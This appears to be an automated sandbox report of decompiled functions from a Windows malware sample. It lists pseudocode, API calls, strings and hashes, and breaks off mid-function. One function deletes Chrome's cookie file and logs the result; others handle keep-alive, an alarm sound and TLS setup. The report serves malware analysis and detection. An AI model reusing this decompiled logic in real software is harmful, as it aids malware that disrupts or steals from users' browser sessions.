                              • Opcode ID: 1db99bcae78c58c5525224386743f8d085ec1c2c788c01b57ff3d4df492baf61
                              • Instruction ID: 0a03f5c56435e7b7bf565aa8bafc0807e20b5707f116f6618a4dc7084de369cb
                              • Opcode Fuzzy Hash: 1db99bcae78c58c5525224386743f8d085ec1c2c788c01b57ff3d4df492baf61
                              • Instruction Fuzzy Hash: 0401683320D7112E96117FB57C8569B2A44DB8D379F30223FF111512F1FE585C11564E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040A320, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E0040A320(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				L00401FA7();
				if(DeleteFileA(L00401F75( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00402064(_t20, _t28);
						L0040AA8C(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				L00401FA7();
				return _t21;
			}













                              0x0040a320
                              0x0040a320
                              0x0040a340
                              0x0040a345
                              0x0040a34e
                              0x0040a364
                              0x0040a38a
                              0x0040a38c
                              0x00000000
                              0x0040a366
                              0x0040a36d
                              0x0040a370
                              0x0040a37e
                              0x0040a380
                              0x0040a391
                              0x0040a391
                              0x0040a396
                              0x0040a39b
                              0x0040a377
                              0x0040a377
                              0x0040a377
                              0x0040a370
                              0x0040a3a3
                              0x0040a3ae

                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040A35C
                              • GetLastError.KERNEL32 ref: 0040A366
                              Strings
                              • [Chrome Cookies found, cleared!], xrefs: 0040A38C
                              • UserProfile, xrefs: 0040A32C
                              • [Chrome Cookies not found], xrefs: 0040A380
                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A327
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              • API String ID: 2018770650-304995407
                              • Opcode ID: 48f30c73d3cdd6f5fc39c1c0410eba610e0be0163ac94731c68b7afb8454ecb1
                              • Instruction ID: 71bab83c232eb3aa80a51950a53fe90676adfd60c2a68e252f2a60659ee967f7
                              • Opcode Fuzzy Hash: 48f30c73d3cdd6f5fc39c1c0410eba610e0be0163ac94731c68b7afb8454ecb1
                              • Instruction Fuzzy Hash: 38016761A4030556CB09BAB5DD1BCAE7724A912705B50017FFC02731D2FD7D591D85DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004050E5, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E004050E5(void* __ecx, void* __edi, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t24 = _t23 - 0x18;
					E00402064(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
					E00402064(_t17, _t24 - 0x18, "[WARNING]");
					E004165D8(_t17, __edi);
				}
				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t22 + 0x54));
				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
				CloseHandle( *(_t22 + 0x58));
				return 1;
			}






                              0x004050e9
                              0x004050ef
                              0x00000000
                              0x0040514d
                              0x004050f5
                              0x004050f7
                              0x00405101
                              0x00405110
                              0x00405115
                              0x0040511a
                              0x0040512c
                              0x0040512f
                              0x0040513a
                              0x00405143
                              0x00000000

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405123
                              • SetEvent.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040512F
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040513A
                              • CloseHandle.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405143
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                              • String ID: Connection KeepAlive disabled$[WARNING]
                              • API String ID: 2993684571-804309475
                              • Opcode ID: 62cbe304c64b1b052eb63cd763b1aa4c4c9c451a961974cb8a0c296cbd61470b
                              • Instruction ID: 4a3f3a8db73678ad982533098c460406716fc9acf26f117caeb6870947dcbcc6
                              • Opcode Fuzzy Hash: 62cbe304c64b1b052eb63cd763b1aa4c4c9c451a961974cb8a0c296cbd61470b
                              • Instruction Fuzzy Hash: 4CF0C8718007507BDB113F759D0EA677F98DB01356F00057AF901926F2D9B585548B5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043B80E, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043B7BF,0000000C,?,0043B75F,0000000C,00468178), ref: 0043B82E
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043B841
                              • FreeLibrary.KERNEL32(00000000,?,?,?,0043B7BF,0000000C,?,0043B75F,0000000C,00468178), ref: 0043B864
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll$@
                              • API String ID: 4061214504-2482086136
                              • Opcode ID: 6526ced06a94fd25e04ba9610b20bb07d14150e0d13d4829313775084854035e
                              • Instruction ID: 4e1649a62f6ee3b09e01f81ad3869626034710fcbdaf9da01478699b77b668ad
                              • Opcode Fuzzy Hash: 6526ced06a94fd25e04ba9610b20bb07d14150e0d13d4829313775084854035e
                              • Instruction Fuzzy Hash: A1F04430600618BBCB155F65EC09B9EBFB8EB04757F5040BAF905A2261DB799E44CA98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004160D6, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E004160D6(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				WCHAR* _t13;
				void* _t15;

				_t16 = _t15 - 0x18;
				_t13 = __ecx;
				E00402064(_t7, _t15 - 0x18, "Alarm has been triggered!");
				E00402064(_t7, _t16 - 0x18, "[ALARM]");
				E004165D8(_t7, _t11);
				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}








                              0x004160d8
                              0x004160db
                              0x004160e4
                              0x004160f3
                              0x004160f8
                              0x00416116
                              0x0041611d
                              0x0041612a

                              APIs
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416108
                              • PlaySoundW.WINMM(00000000,00000000), ref: 00416116
                              • Sleep.KERNEL32(00002710), ref: 0041611D
                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416126
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: PlaySound$HandleLocalModuleSleepTime
                              • String ID: Alarm has been triggered!$[ALARM]
                              • API String ID: 614609389-1190268461
                              • Opcode ID: 68993d820f74bbe01997498476c5e457ff48922b1f7a2ea0347d234afb1a11a0
                              • Instruction ID: 2d10eecb587f4eb50cd82e886fdd1c0de5a54b8a21b058e5acdb0cdc04fd1f38
                              • Opcode Fuzzy Hash: 68993d820f74bbe01997498476c5e457ff48922b1f7a2ea0347d234afb1a11a0
                              • Instruction Fuzzy Hash: FFE09262A00320379524377B7D0FD2F2D28CAC2BA2B01006FFA08661D29D944900C6FB
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004350A9, Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                              Download Yara Rule
                              C-Code - Quality: 69%
                              			E004350A9(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = L00439E14();
					_t159 = 0x16;
					 *_t113 = _t159;
					E0043626D();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = L00439E14();
					_t158 = 0x16;
					 *_t111 = _t158;
					E0043626D();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = L00439E14();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				L00441D1C(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E00441551( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E0044157D( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E004415A9( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E0043B307();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E004504E0(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E00450430(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0045
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = E004504E0(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E00450430(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = E004504E0(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E00450430(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = L00441D6D(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E0043B307();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = L00441D6D(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E0043B307();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0043629A();
				asm("int3");
				_push(_t155);
				_t69 = E0043B2A2(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E004350A9(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}




















































                              0x004350a9
                              0x004350b2
                              0x004350b7
                              0x004350b9
                              0x004350c0
                              0x004350c1
                              0x004350c3
                              0x00000000
                              0x004350c8
                              0x004350cc
                              0x004350d4
                              0x004350d5
                              0x004350d7
                              0x004350da
                              0x004350dc
                              0x004350de
                              0x004350e5
                              0x004350e6
                              0x004350e8
                              0x004350ed
                              0x0043511e
                              0x00000000
                              0x0043511e
                              0x004350f1
                              0x004350f4
                              0x004350f7
                              0x004350f9
                              0x00435111
                              0x00435111
                              0x00435118
                              0x00435119
                              0x0043511b
                              0x0043511d
                              0x00000000
                              0x0043511d
                              0x004350fb
                              0x004350fd
                              0x00000000
                              0x00000000
                              0x004350fd
                              0x00435101
                              0x00435102
                              0x00435105
                              0x00435107
                              0x00000000
                              0x00000000
                              0x00435109
                              0x0043510f
                              0x00000000
                              0x00000000
                              0x0043510f
                              0x00435124
                              0x0043512c
                              0x00435130
                              0x00435133
                              0x00435136
                              0x0043513b
                              0x0043513c
                              0x0043513e
                              0x00435148
                              0x0043514d
                              0x0043514e
                              0x00435150
                              0x0043515a
                              0x0043515f
                              0x00435160
                              0x00435162
                              0x00435168
                              0x0043516b
                              0x0043516d
                              0x0043516f
                              0x004351f0
                              0x004351f0
                              0x004351f1
                              0x004351f2
                              0x004351f9
                              0x004351fb
                              0x00000000
                              0x00000000
                              0x00435201
                              0x00435207
                              0x00435208
                              0x0043520a
                              0x0043520c
                              0x00435228
                              0x00435228
                              0x0043522b
                              0x0043522b
                              0x0043522c
                              0x00435232
                              0x00435236
                              0x0043523b
                              0x0043523d
                              0x0043523f
                              0x00435244
                              0x00435247
                              0x00435249
                              0x00435249
                              0x00435252
                              0x00435259
                              0x0043525b
                              0x0043525e
                              0x0043525f
                              0x00435265
                              0x00435269
                              0x0043526e
                              0x00435271
                              0x00435273
                              0x00435278
                              0x0043527b
                              0x0043527e
                              0x0043527e
                              0x00435287
                              0x0043528e
                              0x00435290
                              0x00435293
                              0x00435294
                              0x0043529a
                              0x0043529e
                              0x004352a3
                              0x004352a6
                              0x004352a8
                              0x004352ad
                              0x004352b0
                              0x004352b3
                              0x004352b3
                              0x004352c1
                              0x004352c3
                              0x004352c5
                              0x004352f2
                              0x004352f2
                              0x004352f8
                              0x004352ff
                              0x00435300
                              0x00435303
                              0x00435303
                              0x00435306
                              0x00435309
                              0x0043530b
                              0x00000000
                              0x00000000
                              0x00435310
                              0x00435317
                              0x0043531a
                              0x00435320
                              0x00435323
                              0x00000000
                              0x004352c7
                              0x004352c7
                              0x004352cd
                              0x004352cd
                              0x004352d4
                              0x004352d5
                              0x004352d8
                              0x004352d8
                              0x004352d8
                              0x004352db
                              0x004352de
                              0x004352de
                              0x004352de
                              0x004352de
                              0x004352e1
                              0x004352e1
                              0x00000000
                              0x004352e1
                              0x004352c9
                              0x004352cb
                              0x004352e8
                              0x004352ea
                              0x00000000
                              0x00000000
                              0x004352ec
                              0x00000000
                              0x00000000
                              0x004352ee
                              0x004352f0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004352f0
                              0x00000000
                              0x004352cb
                              0x004352c5
                              0x0043520e
                              0x0043520f
                              0x00435215
                              0x00435217
                              0x00000000
                              0x00000000
                              0x0043521c
                              0x0043521f
                              0x00000000
                              0x0043521f
                              0x00435171
                              0x0043517b
                              0x0043517d
                              0x0043517e
                              0x00435180
                              0x00000000
                              0x00000000
                              0x00435182
                              0x0043518c
                              0x0043518f
                              0x00435195
                              0x00435196
                              0x00435198
                              0x0043519b
                              0x0043519c
                              0x0043519f
                              0x004351a6
                              0x004351a8
                              0x00000000
                              0x00000000
                              0x004351ae
                              0x004351b1
                              0x00000000
                              0x00000000
                              0x004351b7
                              0x004351b8
                              0x004351be
                              0x004351c0
                              0x00000000
                              0x00000000
                              0x004351c9
                              0x004351ca
                              0x004351d0
                              0x004351d1
                              0x004351d4
                              0x004351d5
                              0x004351dc
                              0x004351de
                              0x00000000
                              0x00000000
                              0x004351e4
                              0x00000000
                              0x004351e4
                              0x00435184
                              0x0043518a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043518a
                              0x00435173
                              0x00435179
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00435179
                              0x00435162
                              0x00435150
                              0x00435328
                              0x00435329
                              0x0043532a
                              0x0043532b
                              0x0043532c
                              0x0043532d
                              0x00435332
                              0x00435338
                              0x00435339
                              0x0043533e
                              0x00435340
                              0x00435342
                              0x00435344
                              0x00435348
                              0x00435350
                              0x00435355
                              0x00435355
                              0x00000000
                              0x00435355
                              0x00435359

                              APIs
                              • __allrem.LIBCMT ref: 00435236
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435252
                              • __allrem.LIBCMT ref: 00435269
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435287
                              • __allrem.LIBCMT ref: 0043529E
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004352BC
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 1992179935-0
                              • Opcode ID: cf421956008c0296b8590752cd63f23a946e04caaf8df9a8b491fe77ede8eb7a
                              • Instruction ID: 0f9574e79e851dcb61412f9348aa4e336ac1525895054df9afc56f3bdc95fefa
                              • Opcode Fuzzy Hash: cf421956008c0296b8590752cd63f23a946e04caaf8df9a8b491fe77ede8eb7a
                              • Instruction Fuzzy Hash: B6813E72A00F059BEB20AE69CC42B6B73E8DF49768F14552FF511D7382E778D9408B98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00440972, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E00440972(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x46a1e0; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = L0043DFD9(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = L00440F8E(_t25, _t36, __eflags,  *0x46a1e0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E004407E4(_t25, _t31, 0x46b654);
							L0043EE85(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						L0043EE85();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E0043E5DA(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x46a1e0; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = L0043DFD9(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = L00440F8E(_t27, _t37, __eflags,  *0x46a1e0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E004407E4(_t27, _t32, 0x46b654);
									L0043EE85(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								L0043EE85();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = L00440F38(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = L00440F38(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                              0x00440972
                              0x00440972
                              0x00440972
                              0x0044097c
                              0x0044097e
                              0x00440983
                              0x00440986
                              0x00440994
                              0x0044099b
                              0x004409a0
                              0x004409a3
                              0x004409a6
                              0x004409b8
                              0x004409bd
                              0x004409bf
                              0x004409ca
                              0x004409d1
                              0x004409d6
                              0x004409d9
                              0x004409db
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004409c1
                              0x004409c1
                              0x00000000
                              0x004409c1
                              0x004409a8
                              0x004409a8
                              0x004409a9
                              0x004409a9
                              0x004409ae
                              0x004409e9
                              0x004409ea
                              0x004409f0
                              0x004409f5
                              0x004409f8
                              0x004409f9
                              0x004409fa
                              0x00440a01
                              0x00440a03
                              0x00440a05
                              0x00440a0a
                              0x00440a0d
                              0x00440a1b
                              0x00440a27
                              0x00440a2a
                              0x00440a2d
                              0x00440a3f
                              0x00440a44
                              0x00440a46
                              0x00440a51
                              0x00440a57
                              0x00440a5f
                              0x00440a61
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00440a48
                              0x00440a48
                              0x00000000
                              0x00440a48
                              0x00440a2f
                              0x00440a2f
                              0x00440a30
                              0x00440a30
                              0x00440a63
                              0x00440a64
                              0x00440a64
                              0x00440a0f
                              0x00440a15
                              0x00440a19
                              0x00440a6c
                              0x00440a6d
                              0x00440a73
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00440a19
                              0x00440a7a
                              0x00440a7a
                              0x00440988
                              0x0044098e
                              0x00440992
                              0x004409dd
                              0x004409de
                              0x004409e8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00440992

                              APIs
                              • GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
                              • _free.LIBCMT ref: 004409A9
                              • _free.LIBCMT ref: 004409D1
                              • SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409DE
                              • SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
                              • _abort.LIBCMT ref: 004409F0
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$_abort
                              • String ID:
                              • API String ID: 3160817290-0
                              • Opcode ID: 19877d3d14e59a494c44e4fde6bb29c47705ca6ce07b5f93ecaa518254929c4a
                              • Instruction ID: a31c51b4580a199ad3038d9a62967fb3efd0f479f4e7b394ce716d3395aa3357
                              • Opcode Fuzzy Hash: 19877d3d14e59a494c44e4fde6bb29c47705ca6ce07b5f93ecaa518254929c4a
                              • Instruction Fuzzy Hash: ACF0F976141A0037F61127666C06E5F1225ABC1BAAF24012FFA14A22D3EE7CCC2245AF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041B671, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 174COMMON
                              Download Yara Rule
                              C-Code - Quality: 97%
                              			E0041B671(short* __edx) {
				signed int _v8;
				intOrPtr _v12;
				short* _v16;
				short _v20;
				char _v24;
				intOrPtr _v28;
				char _v80;
				void* _t45;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				char _t68;
				char _t69;
				char* _t70;
				signed int _t71;
				short* _t72;
				signed int _t76;
				char* _t79;
				char* _t81;
				intOrPtr _t82;
				char* _t85;
				void* _t86;
				void* _t89;
				intOrPtr _t91;
				char* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_v16 = __edx;
				_v8 = _v8 & 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = L0040BE3C();
				_t85 = "TLS_AES_128_GCM_SHA256";
				if(__edx == 0) {
					L37:
					return 0;
				}
				_t45 = L00438E20(_t85, "ALL", 3);
